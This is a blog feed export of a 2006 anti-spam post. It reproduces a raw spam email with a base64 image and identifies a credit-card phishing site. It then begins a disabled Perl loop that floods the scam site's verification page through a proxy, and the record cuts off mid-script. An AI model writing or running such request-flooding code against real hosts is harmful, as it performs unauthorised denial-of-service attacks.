<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss'><id>tag:blogger.com,1999:blog-8256693</id><updated>2009-02-21T05:42:05.332-05:00</updated><title type='text'>Spam Hunter</title><subtitle type='html'>Viagra, penis enhancements, porn, mortgage rates, and much more are shoved into my inbox everyday.  I'm not trying to win the spam war.  I just like to vent by choosing one email a day, tracing down the jerk who sent it and publishing any antics that ensue.</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://spamhunting.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8256693/posts/default'/><link rel='alternate' type='text/html' href='http://spamhunting.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>djuti</name><uri>http://www.blogger.com/profile/04833898483742137542</uri><email>noreply@blogger.com</email></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>16</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-8256693.post-114400335856490711</id><published>2006-04-02T14:33:00.000-04:00</published><updated>2006-04-02T14:46:09.803-04:00</updated><title type='text'>The Fastest, Most Effective Weight Loss Suplement</title><content type='html'>VICTIMX-Account-Key: account3&lt;br /&gt;X-UIDL: 1143992203.3896.VICTIM.com,S=13396&lt;br /&gt;X-Mozilla-Status: 0011&lt;br /&gt;X-Mozilla-Status2: 00000000&lt;br /&gt;Return-Path: &amp;lt;xxenfqoyjxzy@mamma.com&amp;gt;&lt;br /&gt;Delivered-To: VICTIM@VICTIM.com&lt;br /&gt;Received: (qmail 3880 invoked from network); 2 Apr 2006 15:36:41 -0000&lt;br /&gt;Received: from unknown (HELO user-12hcp2b.cable.mindspring.com) (69.22.100.75)&lt;br /&gt; by VICTIM.com with SMTP; Sun, 02 Apr 2006 11:36:41 -0400&lt;br /&gt;FCC: mailbox://xxenfqoyjxzy@mamma.com/Sent&lt;br /&gt;X-Identity-Key:    Id4&lt;br /&gt;Date: Mon, 03 Apr 2006 05:32:33 -0300&lt;br /&gt;From: Leona Jordan   &amp;lt;xxenfqoyjxzy@mamma.com&amp;gt;&lt;br /&gt;X-Accept-Language: en-us, en&lt;br /&gt;MIME-Version: 1.0&lt;br /&gt;To: VICTIM@VICTIM.com&lt;br /&gt;Subject: re[2]:&lt;br /&gt;Content-Type: multipart/related;&lt;br /&gt;     boundary="------------000005070406060507080002"&lt;br /&gt;&lt;br /&gt;This     is   a   multi-part  message      in     MIME   format.&lt;br /&gt;--------------000005070406060507080002&lt;br /&gt;Content-Type: text/html; charset=us-ascii&lt;br /&gt;Content-Transfer-Encoding: 7bit&lt;br /&gt;&lt;br /&gt;&amp;lt;html&amp;gt; &amp;lt;head&amp;gt;   &amp;lt;meta    http-equiv="Content-Type" content="text/html;       charset=iso-8859-1"&amp;gt; &amp;lt;/head&amp;gt;      &amp;lt;body     bgcolor="#FFFFFF"   text="#A90930"&amp;gt;   &amp;lt;p&amp;gt;      &amp;lt;a href="http://dwam039.cutecactuus.com"&amp;gt;&amp;lt;IMG   SRC="cid:part1.00040701.00020201@mquosulu@moebelheinrich.de"    border="0"     ALT=""&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;&amp;lt;p&amp;gt;&amp;lt;font      color="#FFFFFC"&amp;gt;Paul stretched out and laid hold of the jamb in a death grip.    in 1823    in 1838 They keep records.&amp;lt;/font&amp;gt;&amp;lt;/p&amp;gt;&amp;lt;p&amp;gt;&amp;lt;font       color="#FFFFF9"&amp;gt;Ramage found now, following Geoffrey through the gates and into a thin mist that turned the leaning grave markers into islands, that what should have redeemed with nobility only made it seem all the more horrid.      Shinny?    Of course.       He pushed himself up and tottered erect on his right foot.   Then I helped you into your chair so you could write.  He wrote undisturbed for the next four hours†ó until the points on all three of the pencils she had sharpened for him were written flat†ó and then he rolled himself back to the bed, got in, and went easily off to sleep. She turned considerately away while he fumbled his penis into the cold tube and urinated.     I agree with you&amp;lt;/font&amp;gt;&amp;lt;/p&amp;gt;&amp;lt;/body&amp;gt;&amp;lt;/html&amp;gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;--------------000005070406060507080002&lt;br /&gt;Content-Type:   image/gif;&lt;br /&gt;      name="plume.GIF"&lt;br /&gt;Content-Transfer-Encoding: base64&lt;br /&gt;Content-ID:    &amp;lt;part1.00040701.00020201@mquosulu@moebelheinrich.de&amp;gt;&lt;br /&gt;Content-Disposition: inline;&lt;br /&gt;       filename       =  "plume.GIF"&lt;br /&gt;&lt;br /&gt;R0lGODlhgwItAfLGAAYHAICAgP8AAAAA/////wAAAAAAAAAAACH5BAQAAAAALAAAAAByAiUBAAP/SLrc/&lt;br /&gt;jDKSau9OOvNu/9gKI5kaZ5oqq5s675wLM90bd94ru987//AoHBILBqPyKRyyWw6n9CodEqtWq/YrHbL&lt;br /&gt;7Xq/4LB4TC6bz+i0es1uu9/wuHxOr9vv+Lx+z+/7/4CBgoOEhYaHiImKi4yNjo+QdgKTkUiTlwIKmJSN&lt;br /&gt;l5GeeJuimASbJ6OmVKIRqzCorZqclKCcKKC2o7GpC7kVtxS7IL03qDTBT7+nmby1pcvOzybJzVOkENYz&lt;br /&gt;ydDMz7vUJdrS39us0cDjEuEe6jK37C3vSfHC0b+18x3T5lLYDv0x4e4JdLePiTZ26MAl5ICPhT4bDYtE&lt;br /&gt;ZFiv2cAUD+mRWHgu/+A/jb7GXWQw0QJHhyLRnQwxb6UuHAcLviiZI6VMjAlpXtDZcQRPXTZdmnTZktrP&lt;br /&gt;a0JxffPoIl7EoyJiQkxa0ybAnFQxQH3wkWJWksegfUVK9KS+mxu6Xt33cayGd2q5uvU5V6klj2iV3fQU&lt;br /&gt;FuhKWmxh+c30Cuy/V4KHkmO22PBhU4XLdTOHWHDiwYi5iSXIGV/MpQUT413FF1tkyR0f97sMNJ3Ri8dK&lt;br /&gt;f/YXe1Znsmc3c4O1NQPC04xfTgDcAPDIkcUnK48lnGJjZ88Xc2befLhAuZRBa95O7izy4NSjY0/+Wu72&lt;br /&gt;2svsAX/Kcbrw43vbmiZV2XZlw8nP1w8LPzN3/P+uYDVQReRZVxuABP0X3ksJirdTetc9l1uDDtLGWm5g&lt;br /&gt;FSghhKENmN+CFf5nX4YfcqdeRcqlqKBraE0YIYXYzQagWLvV2JqI2amoG43gNTffdyuu8FuOCjolS3YI&lt;br /&gt;RrghkQ0edeRk1X02X5DjgVhdYxhqJ96JJC6ZGmMwXulelECO2RNZFk4pXV6boajhkhySt5yY33FJ55wm&lt;br /&gt;ptSOgG/ex6KVGnblXS7ysemafmR22FdDYd7pGKEL4TUjdJjFNeOIVvqJpUVlAvknmmlK+daPfYIWZ6kp&lt;br /&gt;DmOnj/55eSWgQvJ56VdF/fgakZJxamg5mtVpFXpDsYnhq1QSm6WbXoVH3Jv/oCZapKeoNYsfellZM6yM&lt;br /&gt;Mq6Z16raGoiqeWtFm+euzMp5Z6fCWjsXbHhuOWC7n8brrLQWVolosSERtpxV8q56rVBD2kstue/duqJx&lt;br /&gt;9bK6ra6zLoyru3vG97BO6nBr47AG6kswbY/iqKi5IU5Kr8Uil/sqsPmstmh7Bm86McCylltoh1X+G9ip&lt;br /&gt;DePrcs7ydstxuCN76JtKDFNacI4yMewkisje2LF+uzLlqI1pilsytSl7h1vPbcoMLb3Qzexm0SUm+XJg&lt;br /&gt;BzdtKbe3We1zVRIzq7K3Ai97NHVzK33kqHK33CuydtvbJcY84q1ewUHO3OWXjuU6eHluu8cy2l7qXbLR&lt;br /&gt;/+Pq6OrmLhM4b6Kebx54NjGfaymxbaqLs2W9INw16mXv/G137zqcMOeVPtoZ2ZenTrCkuarctODa1vqz&lt;br /&gt;z667fjucvPFu8aBs8+67yLsPH+vA9glv5MqyAVf4brUz3XjwUGImZ/VIs3gfpNiHmr75vb+uFc0Zh19p&lt;br /&gt;9t0b53CrqYNvP27cw9/0zgc9poVvPwZMFf6e9LBKfKAuDpSH9+iwvQj2AYIWlMitNnaGCmZQDxj8YBCA&lt;br /&gt;J4nJiTAUHDzhEUhYBw+qcA4hfKEPpHYHF8rwhji8XuxaaMIc+vCHCmGNHIahuxQC8YhITKISl8jEJjrx&lt;br /&gt;iVCMohSnSMUqWvGKWMyiFv+3yMUuevGLYAyjGMdIxjKa8YxoTKMa18jGNrrxjXCMoxznSMc62vGOeMyj&lt;br /&gt;Hve4xgAQwI9/DIAgAckCQmoAkIb0QCIP+QFB8vGRQ/AjIhmwyB5MMgSVxEAmLbBJSHoSB5JUQCIJOUhK&lt;br /&gt;OlKUgdTkH1PJSUdK0pClvMArTUnKU65ykJ1sQCxj+cle/mCUqAwmKUV5yVYWkwKIvOQwWynMBYRSmMec&lt;br /&gt;wDJz6ctqzgCYq2ymNrNZgWdyE5nBzOYyu+nMcGJznODcpjXXeYNz4pKYuyynLNEpTXPC05bpFOc7A3lK&lt;br /&gt;ekpgmiwAAAAaIFCCDpQABc1AQh+wUIQ2FAkPXUBEOTD/UYUetKIW/QBGYUWxBMZwB6rpCwzO6YBF+jMC&lt;br /&gt;3qSmPAHKSHVys5gqtec3UfDQml70oBjA6EIFulEhVLSnFwAqBRIq1KHilKJHXR78glVEI44wGMWwASzl&lt;br /&gt;Kc6VRvOfL5WlTE8KAZbekpgyJadLT9BQnh6VqEmtQFGLCoSfphWpIEBrCNgKAYzKp0cZW5wVlPdRTO7T&lt;br /&gt;mfjk5Sy1ytUHuJKqvBTrS2152MXOs7Ak2ClPJYrTgk6WAWatrFkZetPLYlazlPWsQylbV9E6VLSSJW1o&lt;br /&gt;R8tZ025WAZmFLWhDW9abyla1DnjtbV2rW9kOdKKliZ1ZbKPXoPbWsmmN7W2Xe9ra/56WV+DpazuRuFPW&lt;br /&gt;WjezklWucg3q24imtrme/a5BdYvd2V5Xs9v97Hax213bMre8qpUrc9UbXva2N7u95QVeIZeOHmXPAvBt&lt;br /&gt;73hf+90Ag9euj/veEmKaweqK97Lyfe9bJRwBudbXvdb9LGkvTOHlQti7ZzVvhM873wLPFsQafi5rOfzh&lt;br /&gt;Ce8XSQ9qqlHR69vcZpfEHFZxUQ/ITgkgd7chxi135zvkDHN3xCs2r5B/nOIHY9jInC3xk8Vb5AgzebxR&lt;br /&gt;9nBSrwxl4cJYMf7liE2JTGQLPznJQhaX9Hq8Yds6V8rkdTGVj3xmKyf3rWMmsZZTbGMCT/jNGbYvmoFc&lt;br /&gt;WtSeuP+8vw3yofSaFJZNIM8TRbSbO2vfORPveGzWsJn5jN/6VljJdC4zhlFs4yE7Wcqt9XNpOY3eOFNY&lt;br /&gt;p67WMnwBjRQvz886j97yme/74SQH2NImw/QL/srJcJ5glFMttlYp2VWUqjKgv20zq1FNZtxuVNVNBnWg&lt;br /&gt;E21qEU/5ztkOt7W/Hd8QA7XXe85ytRn95ZDg2se6rva1gd1hsIFrpMxeNoMZCdl8Knam+TbsDwwd73Sr&lt;br /&gt;uMv1TnWNF47WO3f24Oj2tI5JPfGHb5vhNDZ4c9U9aF9ruuHvTvCtw5yXHEca0Dk2uF2TZr0WJJufiIX5&lt;br /&gt;YOFZzlDiE6XJtLljATvNm5eUqjD/NydjWRn0r+7bAwSvMqXjfPI0Y5m2F87vfaHeaSenl9etxi+vsV5u&lt;br /&gt;9X461uddr6CbqsBnVLQwUUW4gd2aXoKD/eyqIuKwBb5NZSrTqmAFuC6zysq78z2sdH+53/WJyp4bWwVJ&lt;br /&gt;n3Z3t41nbRdZwF5nu655y204d3mztbUpjbVu4sf3WdGM13yX15MMuMf9F7A29NfzTF/Qm35gNfirVwcP&lt;br /&gt;07B2kqVe/TnQsbrJq9Y+3/0eA135MHyfmsDFifg97q0aT8CXdJ/Kf/7NE2tYb95T6P1k/u/VIHVCdJ8J&lt;br /&gt;yKdoI5I9+7of/u+3X+lW937+9sd8/XwfZvnXYFpD1L8J4d9A//4FQX71a3P+49R7exd9VUV0f0d3/+d3&lt;br /&gt;2Vd4eRd8mfaAIEBsiQV9KcVz76d3h/dMAQhL1ld0zQZ8GghYBUh42weBJniCKJiCKriCLNiCLviCUlB8&lt;br /&gt;+pd/TQcDMvh1uWZcGnCDAAZ6SsEvarV/FnV/MNgDPJhTNNh4MXCEA5aDPbiDQghXTrcRrCNSnhdXY0cE&lt;br /&gt;uHR09XRs7sd+XEgCJgUGTBhZSmiDUWhUQbgCZQhvfCYOoaMkbjgCKaeFAReBKLBvV4Vv7LeEiTZ5KAda&lt;br /&gt;lBd68GZZ47ZkqidtevZ5QTaIqQeIWQd5KgduQCZn5pZ5gJhqkwaJH+dikMNfWIaJ3kZbov92BNhUdBM4&lt;br /&gt;dBLYdxxYgiNIfTJHdLDogalYczRHi/3kc2QlaGvnbWL3i0TYi4c4dR1mZ5pYdVknecgoYMK4iON2dc/o&lt;br /&gt;Z0xXf9rFi9YIjaACilSXjKO2dH+WhtMFfLZofn2nS8lkfvREe7qXfenofwV4jvG3jru3iw9ncr4oaxj3&lt;br /&gt;hhg3ivUmX6cGZYHoXi3GcVxmYhnXeUq3a/goiaNFa5bXcWG3buDzYn2Wj8NYkA5nimA4jgHnigEoj2P4&lt;br /&gt;ivLIgBmoeyNoe+fnirv4cd02jBAJcnPYj4cmbqcmVP/okAsXk0hmjDXojOIGdRUZkz7pkj3lDe1GbaVG&lt;br /&gt;aAfXWkjgTrv/xFjQt3sfeX1ftZH85HO1t4XSx3MLiFhRaZUYaIYs+ZM36XrfF4gX+Y0QJ4iW+HbkpokD&lt;br /&gt;ZpCVxpbqRm8Nx15td5Zm2Xr8eCbaeHFUp4jgFZQaKY4fGJIzNZUAFZJ76I4deJgm6XwAp5LH14gF948v&lt;br /&gt;eYlnKJNdd4yHqIxlqY+tt43l9mt0mZRDKWtz6XabuYjNiHDg8pcB6WqieIV2eIEVGI8lCX9DN5L+lJVS&lt;br /&gt;6Zj/936MOY+VOZad6Zpv+XRviJkjBpPPeX9oqXHnhpHJiZobh5p2qZDMuVqPh5CceW+Gs0NvRmvdl4hN&lt;br /&gt;SWyoGFi9aYBTmUonBVO62Fj6VEmpyIFA/ydYyHaLbAhy9piTBmmRZDaQC+lxE3ed55lxekag31l5a5mT&lt;br /&gt;mdmT2wmhx+WgALmXEZlwPGM040CgN0aKgIkIYSgHvQiMEhd20wia3BiNVsd4hSZ2LAqaXCdhMOqd2ul4&lt;br /&gt;KNpiUXdyxnhgmOk+HvWiOlqhmllw10kHI0qifxiXodiXz4WJheiiVFahyCmRmOekk/WI9OWMeWmbyrlq&lt;br /&gt;QAmiYhqUVueg9OYXVROlnGeki+d5SAaDbSgDcZpRXDCnh2CnRSiaRYCnMwaOSvB9IgSoeYp0fpoDfJpr&lt;br /&gt;hZoERHhCizoGmYSYX1hsSTqolCoGkBqWklqpmpoFitmehzVYE2iB/P9JfY+5qab6BB+5fPA5eOjIkZN6&lt;br /&gt;qrAaSUbHm666m/LXh7Gaq1agczm3gLfqUsoHla+qq8S6A7yakvaUeyJ5h5harM56m+iXgLopnL/arM96&lt;br /&gt;rb+Un56qc9DUkcIqqtaKreLaBMM6rubqBep5ruq6ruzaru76rvAar2aUrhugi3m3ngZYfeUqr/CaixHY&lt;br /&gt;e7VUS/lqjvxasB3Ano10ezl3r9K0rwbbrgi7qlxJlRL7fBLrrxX7ThSIsQP7sOsasaXEsQIrcyY1S64E&lt;br /&gt;jyGLsiN7siLose8KsiprjhiLlSYLqjHLii3rr/bqsuYKsw2InzNbshd7s0HLlTrrsDybpz6Lsz//27Rb&lt;br /&gt;OapEC48Dy7JJ664iS7VQ6bTz+a1ae7NM64FVy64SOHPs+ZQMC6762bUMO7ZIG7anurNJMItu+7JtG3t1&lt;br /&gt;O7eaCrdGQK+F0Kh4+7c+gI2AO7gt0FOCSriIS49tmaiJ27hQKHmOG7n9yaOHKrmSi42Ha7ma+7ggVrmb&lt;br /&gt;67jQ6LefO7pBmF+ZS7qou2qDmLqsi4RLKbqtG7tPmnkcJ6euK7t5CpNL2aa5BW3V6bm4a0cMSnnUKLpl&lt;br /&gt;ZVxJCKh8qpdZKpTBm0QeWpsKN6YGNmPMKbjUy7jV66PBqKNyZH1324UCKFalerDzlAgfGnWsJr3ci7xN&lt;br /&gt;SKWEmZ1IWL1E2nhL//e9WRW+ztaFhCWGyoYI9khpXkehJpqGxCu/u/u6sNuEALq6T5eFbVSBAli2KGmx&lt;br /&gt;8rmwA7iYAne1QAuutFSV8cSxc0C7dVhxmvl587ulu1u8ozm/lYVQNjqmq7W9c1S+5Zi/F4h3y2qfCqh3&lt;br /&gt;M6ubXWmfDVhzKEsHSee9A0y8Gem+W2q6oseQpduWKFyRultHXAWAs2qS6ujD/leq70mO8YmSX/wGjqig&lt;br /&gt;3nnADPyEKly85haYyCvFU8ykEEpHWomAvTpJ3NqHdtd8etxMQrxVfHzHgRdzY+wGSmxxSax5ipzCQMnG&lt;br /&gt;D4y9hRaladzCCVzDxjmttujFXRyZxEmSfezJBP+4v6maw4bcuQx6xqJ4iXQKeY6MykvKxJEsx5MMvFd0&lt;br /&gt;ih1ZwRioqieZs35sx+MYxJK5rFV5gG0gnUx3vcvIuz24iYg8x7NWXdaLg232wpKIbpbMrLYXWJd8ldjX&lt;br /&gt;sszWm5oMyIvFtSN5i4WcBph7zANswuw8hFlawqwJnftnzLFmzfXbvcjXqAu8TvrLqIL7i9m7mpC8egLc&lt;br /&gt;wIp8lwssae9cjcDIl9+opS/agv38QZDsxOmcojcojZBIucn4xqaJ0etMjEwpzbH8vHHgt1KHvWzMuDTq&lt;br /&gt;cGwXv8tMz5PXnTE80iVt0yYdRqcbvPu5zS5XryLAqmm007Kbm8YqVZFaRkT/PbiC1bEkGbLDTMGFB7Af&lt;br /&gt;nLP0icFguLON9ZQaO9WmFK5RtNR/a3i5HH89bNbtt8VnHdU/F8bwucmE944TTdG0LK+UqcuNKczY7I6t&lt;br /&gt;6my5VK1nPX9bJNaA+5U+/JXKys3EnJJ8DMbzyZ99XMdrTZlWtM+EK9i3vMOf7NadbJiJycl/PMxwjdlZ&lt;br /&gt;ZNlMPcTI+s20GtdubXfDicPI2tq5OdndmtNYtNXzCEzbh7CUzdvenIvAHXharYFZi9tCB9a2XbVIO9fJ&lt;br /&gt;Tax8mwHP3dzSPd3UXd3Wfd1eNL7nS77PNqnMjd1ipN3/lk56iEngnUdy281gW9XpzdVcTcQ0F7Be7det&lt;br /&gt;//jVotpz9X3eTFRYoazFX6iqZE3bXWmxmi2SgB3M+o1E45vYnS2+YDzatfqBBb7BHEnKCQ5Ez93fm/1P&lt;br /&gt;zSfIQJys24zfA359+G20F55E/A1/vhyWAO7f7xjhK36pB+7ZJ47iZ+vZec3gta3WEA7KOPfgcg3bel3j&lt;br /&gt;PkSfWpy1XdWe1UeCWG148r3Y8O3Bvq3Y90nkVn7lWJ7lWr7lXN7lXk7kee2F/rZse83JYxXUSf3ljhDm&lt;br /&gt;JqBSYTii6acC363mcQDVUg21j+qV7onk9ZnkxwrZRk7EPJzfYZzedD5+qF1+nP3kuw3jWQ3kj83FfS3p&lt;br /&gt;c37obxDK0XTFs4rZIeh+mP8ezHsY5+XL5pauCJ9uznx7rJxen/YarIE8yPpKS3gMmaXuQKeu2vX053rd&lt;br /&gt;6ViFyaCe1NGX58hd64Rw6jMe48KZ2WU9rXed1l2c4sOOEzcDD0/yIO1ihQQkO1gofLQLm3rKAzxY1zFw&lt;br /&gt;1VJOzsiu3nfY3kZ9n3+8tR383zceMUplFyGzoULkPjxyOmA6hUNwhNMokd++yiWwVmyqR5W+DqZC7UYU&lt;br /&gt;MHxzI/peu+I+8CzNejNQuQRvTQeP8NOOEgtfOjHGHOmBOToY8EHg7wXvhzQlhBFvqtmCpjEiMRoDOn6T&lt;br /&gt;P7oSH2ASXO5sZpTrhhod0XEMwQG90NaszIvciXxZiC7/rXTZhm0qPM1RXGqmrUfZQnpy5x/oozYLxCEr&lt;br /&gt;c/PElfPemMoqemBxGc8i7dDeKPY5WqYY3dFCyo1Yevaht/ZIf88rP0b1MS4bqjCnMvPIYSc0tDcir8Y2&lt;br /&gt;ap4PPfiEj4gAf/jNeY9cepBnSm3TGaIUH5BzvPiJzNIhvqv4lvFZExnHcjaBEhR4MiYk8yIQMoMN6nQ9&lt;br /&gt;aWSW9qZWSomsr2iQtmvRye9TSGpTCmqtv5xXmPvmLeFTUOk2PEN+8vmzAzUypjCZc+8raflYt/qsh/tO&lt;br /&gt;TNA1iviwidDVqHgELZo9qqG7j5S9r2Rl+N6AnN8yG61B955Nrn5T5anzDVZPztac/58soY8rNlP/F9P3&lt;br /&gt;+p92IhC6bIoAAMTqv5gkalYbaZZXP75NHtR1zXaZYko6JwaK8sjK9RvjuWZHprrb/UKzoijAQCaXBKWy&lt;br /&gt;yYROngGqBGm1RrHXbfL5ZWqr4rBUSjaq1+y2WwCXwQWMuchOwEv0+no8/9fH9wdI52dY6KY4A9GzgpIB&lt;br /&gt;ZDT0GKQDcsNIVAmTI4nzeVmyWfQBlEl5yaO6murIucq62HW0pIXWxqUr43Rm63XWW1tGjFssPJusrNh3&lt;br /&gt;6DyB1zyI+BxNmPiMrS14vbyo4hr6qjo6zhkqHivqE3IjHk46uXDKHlTeqQ4KWUp0L5tMpYqTNE0EBgRz&lt;br /&gt;RSAaLv9f0jDsgixiFFrGKkosqNCXt40cte0hNA0ayG7TDFlDNAflSJXUTnacBW6fJUmu1uFL9a5dJJ03&lt;br /&gt;d9Yj91NHOpwyY7nwMLOoUaWw1NX0dlEYwmEUdzEco/EqLaxUo279SvWl2FnNtqVMKfIsSbUuD6n9yBJu&lt;br /&gt;2rNj3TRyCokEP3zr9GI6SkOTX6A97y4dDA9wjw8nEOdlHBivY76PBuN9KVUqsFtiLi6kOKXqZl5gLXYe&lt;br /&gt;XTd1m7LS0M6gWwRtW7fVVsq9U1Y1v0z5ImuiTI+m4hHyhscErjhmcqWQBfczrnPeY1bNL6upbp2jQ62d&lt;br /&gt;wWQ8wt0XGc6gv2NEJrqh5/EJb03/1Q0/vvz59Ovbv48/v/79/De+f68fgP0NSGCBBh6IYIIKLshgEf8N&lt;br /&gt;aFCDEk5IoVgtXIhhhhpuyGGHHn64YYUijkhiiSaeiGKKKq7IYosuvghjjDLOSGONNt6IY4467shjjz7+&lt;br /&gt;CGSQQg4JUITnEXSkgwGpN95BCTFJZJRSTknliwQ1+WRBWYI3kBlbfoell1WOSWaZZvKH5JddrpHRdrwM&lt;br /&gt;tGaaZ85JZ512+vffkhixqZCb4GkZpnl3wpdOgoUWeGgyiSZKaDyDqijnkd4JOoUucLaJRaZaqvfoS8eN&lt;br /&gt;yGhT8oWqyKI7xUdPpzFGeuWkkQKK6Zuwbsqpqt58KiKplqDq/+itve7VqDm2rsiqnpXm2ZCYYWApJ6XD&lt;br /&gt;toFrhbr+o9q0bExrLbTPPdtisVtWOsN2a3LZnpLcfnNXBdhhVwlj61an7ql8NWcZR/RKF9wm8PL0Sr2V&lt;br /&gt;8asPZNmee2CrtPpJK7hmFOukl68SvNhRF/7FbmOmGEYDYIYlli7Gvm7cAsUaW/aUJx6L7E8rIENMrJEG&lt;br /&gt;IfmyuQvHnGzNULKsbWVCMIWBT5gQ1hgsNaXc0SjsyJud0TvLs2tTKRPdG85ST10qwCoLa4/VQm+bnclj&lt;br /&gt;fUqUI7jyNk5O/RaVKtVqr71GtCxM/FtS/0Id72N+DSzqvEeHbPZwW1/HNTxYs0342m7v7f+vTYWt3O4Q&lt;br /&gt;cA8VctySqzxx32ZT2xtvdP9aeOfcHo65OWAL/u9SgLcd+eCKo+PoxUxjnjbplHlOO8SgR/060GM/F9Tl&lt;br /&gt;nvIbNrA7B1V264GjzXntyj97ez6fPKX55j2dk7xdPicN/PVdT3/68EGHvnz4tna8eMXbvz2Z0z6B7Lcy&lt;br /&gt;qXMsMMk8C1Ux3BaPPLL4+o8vMVMn662+eO3qcNDBW8+YE518iUo4BwSccKTTQPDtb4IUrKAFL4jBDGpw&lt;br /&gt;gxzsoAc/CMIQinCEJCyhCU+IwhSqcIUsbKELXwjDGMpwhjSsoQ1viMMc6nCHPOyhD38IxCAKcYhELKIR&lt;br /&gt;j4jEJCpxiUz/bKITnwjFKEpxilSsohWviMUsanGLXOyiF78IxjCKcYxkLKMZz4jGNKpxjWxsI38GAMcJ&lt;br /&gt;wHEAi5jjLOwYJTy2QY8t4iON/CgDQA5LkMubYxwDeUgGELIIi2RkIhPUyNREUo6PnGSDLLmiSGKyTptU&lt;br /&gt;myE/KQI+drKTBCClfUzpjU2K8pElQmUrWYlIOkLMlbP8JCglQEtFwnINuYxPL/PzyzfuMkaaHKaqgmkr&lt;br /&gt;Q1KyksZ0AymRKclmLgiawJRmH6VJzSFlc1CAVKYuZfnNWIITl7AkJB69OYNbLlOXoURnOm05zm/G853x&lt;br /&gt;1KMf1RnOUsKTDe4kZz2ZKUtj4jOf/Vzm/zzPqUpbtjOggvRmMeepz4YqdKHsRKg1LTrOgRqUnuw06EGt&lt;br /&gt;6UmJgnOVGd2nPynqSDpO1KP3jKM9TUpPfMIToiddZz7lSVKcNnKmKK1pOM250p9qlKf+hKkRZgrQiLZU&lt;br /&gt;mQ9dqEyRSlE7SlWjUb2lUXXKyqmO9KrbtBNQbXpTqPo0ompAKkCNalKzplSdaj1qInOK1bcekqgxDepS&lt;br /&gt;WQpRscaVpDA1K033+lK9+pWXZ52oX0sKysG69bB21atSMdrYvxIOk3Alqzx9+tC5VtayOAUrZzna08/G&lt;br /&gt;cqyBxWxSCYtYz36WqmEt7GVJK9fTpnS0nVUqbLEpW8t207W1LahHdf9aVM/yNbW3FR9lT3tXgl60srvd&lt;br /&gt;am5vStuxQrenzBXoc6Nr2n8iVrI7re5HGapdyc72tcrNKm6di13sunO9zWSvedFL3c22VrxrOy5xm+rb&lt;br /&gt;0HL2sNLl73ilK1qwere5qk3vft9bYKfuMrkBtqiB61pamxK4rLF17GPly2DQAjjCAn6vYEFKNftK+Lys&lt;br /&gt;VW1gPxxeuqZ3wrPNMF3la2AOQ3eSKmbwhFm81pUmF8ca9u+F3avf7mo3uixeKoqNO8zcOpjCWkVtfNsq&lt;br /&gt;Wh+vuJztdSmC8QreBBdYxqsF6Yuv3GDNfpfJXx5ymMV7YqIqdroZnvKYp3vgFPcVxFPzrYyXnN3/LDP5&lt;br /&gt;yfwEsyLaHOB1Arq319VvnEM7SnTamMp61rJtO2xmHhO5yn5us5ANzeVDOxrAtGsufMvLZ073N7Z9NnMd&lt;br /&gt;/QxnBdN2x4XeMqmDK2o2vzq7q/bwYicdaUY7OdUbfu6gR/3mMwMbhO4l7nxh3WXuVvqsvd7urRG93BvD&lt;br /&gt;FcbqZfZjNw1kWRs7ztt286ePjez/Jlulth42tlGdbOHqOtwUXHO692pi65r6xzCGMoSLGtQc4zqthf2r&lt;br /&gt;vd2dWR0vu8wqFmeZn1zwaqsZ4Ki+tKu3G1mDP5W+ky34ZrmKbnPje9AJNziWnbngfs+6tjn2tJW7DWFf&lt;br /&gt;exjI+U65pm/b5D1/qXzj5O72r7Xt7X6KdKBdfVTL343vGCc540OVN4gLml9xAxvdSWf3RoFO5mCnGuli&lt;br /&gt;pvi1X67tRiud5EGHepQpjemQi32x63YjEXtu9rSzDO1qPxFj3w73uMt97nSvu93vjve8633vfO+73/8O&lt;br /&gt;+MAL/qpt3yHbC494n9M58YxvvOMfD/nIS37ylK+85S+P+cxrfvOc77znPw/60It+9KQvvelPj/rUq570&lt;br /&gt;CQAAIf5waHFnaHVtZWF5bG5sZmR4ZmlyY3ZzY3hnZ2J3a2ZucWR1eHdmbmZvenZzcnRranByZXBnZ3hy&lt;br /&gt;dXRiZGpldnZqam9xcmJtYXF2anFrcXdoYXBhaHdleHRqZ3h3dGNrbGtkYW94ZnFrYXkAOz==&lt;br /&gt;&lt;br /&gt;--------------000005070406060507080002--&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;The message was sent from user-12hcp2b.cable.mindspring.com which means a botnet.  &lt;br /&gt;&lt;br /&gt;Another Credit Card harvester.&lt;br /&gt;http://dwam039.cutecactuus.com/&lt;br /&gt;This seems like a very cheap amatuer job.  There isn't any type of obfusication.  &lt;br /&gt;The site doesn't even use any SSL.  They do verify that the card will match the algorithm&lt;br /&gt;for each card.&lt;br /&gt;&lt;br /&gt;"Please correct following errors and re-submit:&lt;br /&gt;Numbers does not match with VISA pattern!&lt;br /&gt;Please check your numbers and card type then try again."&lt;br /&gt;&lt;br /&gt;The comment page even has a image verification.  OK, thanks.&lt;br /&gt;&lt;br /&gt;&lt;pre&gt;&lt;br /&gt;#!/usr/bin/perl&lt;br /&gt;use strict;&lt;br /&gt;require LWP::UserAgent;&lt;br /&gt;&lt;br /&gt;my $target = 'http://dwam039.cutecactuus.com/contactus.php?validate=img';&lt;br /&gt;my $count;&lt;br /&gt;my $proxy = 'http://127.0.0.1:3128';    #find your own :)&lt;br /&gt;&lt;br /&gt;## neutered for your own protection.  Learn some perl and you can write your own!&lt;br /&gt;while (0)&lt;br /&gt;{&lt;br /&gt;  my $ua = LWP::UserAgent-&gt;new;&lt;br /&gt;  $ua-&gt;proxy(http  =&gt; $proxy);&lt;br /&gt;  my $req = HTTP::Request-&gt;new(GET =&gt; $target);&lt;br /&gt;  my $res = $ua-&gt;request($req);&lt;br /&gt;  if ($res-&gt;is_success) {&lt;br /&gt;     print localtime() . "\n";&lt;br /&gt;  }&lt;br /&gt;  else {&lt;br /&gt;     print 